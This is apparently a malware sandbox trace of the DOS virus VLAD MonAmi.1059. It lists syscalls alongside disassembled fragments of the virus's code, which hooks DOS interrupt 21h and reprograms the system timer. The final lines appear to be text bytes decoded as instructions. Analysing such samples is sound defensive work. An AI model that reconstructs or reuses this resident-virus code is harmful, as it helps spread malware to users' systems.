Sample viewer

vx.netlux.org/Virus.DOS.VLAD.MonAmi.1059

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:57:06.09174065Z 74 PC: 12a53 | Reallocate memory
2018-12-17T22:57:06.094724624Z 44 PC: 9f352 | Get time 0x9f352: call 0x9f3be
0x9f355: mov ax, 0x3521
0x9f358: int 0x21
0x9f35a: push cs
0x9f35b: pop ds
0x9f35c: mov si, 0xc1
0x9f35f: mov word ptr [si + 0x60], bx
0x9f362: mov word ptr [si + 0x62], es
0x9f365: pop es
0x9f366: pop bx
0x9f367: xchg dx, si
0x9f369: mov ah, 0x25
0x9f36b: int 0x21
0x9f36d: dec bx
0x9f36e: je 0x9f3ba
0x9f370: mov ah, 0x4a
0x9f372: int 0x21
0x9f374: mov ax, cs
0x9f376: dec ax
0x9f377: mov ds, ax
2018-12-17T22:57:06.097307522Z 53 PC: 9f35a | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:57:06.098768974Z 37 PC: 9f36d | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:57:06.101371885Z 74 PC: 9f374 | Reallocate memory
2018-12-17T22:57:06.103159159Z 42 PC: 9f385 | Get date 0x9f385: or al, al
0x9f387: jne 0x9f3ba
0x9f389: mov ax, 0x34
0x9f38c: out 0x43, ax
0x9f38e: mov ax, 0x11
0x9f391: out 0x40, ax
0x9f393: jmp 0x9f3ba
0x9f395: pop bx
0x9f396: dec bp
0x9f397: outsw dx, word ptr [si]
0x9f398: outsb dx, byte ptr [si]
0x9f399: and byte ptr [bx + di + 0x6d], ah
0x9f39c: imul sp, word ptr [bx + si], 0x616c
0x9f3a0: and byte ptr [bx + si + 0x65], dh
0x9f3a3: outsb dx, byte ptr [si]
0x9f3a4: jne 0x9f413
0x9f3a7: pop bp
0x9f3a9: and byte ptr [di], ch
0x9f3ab: and byte ptr [di + 0x65], cl
0x9f3ae: je 0x9f411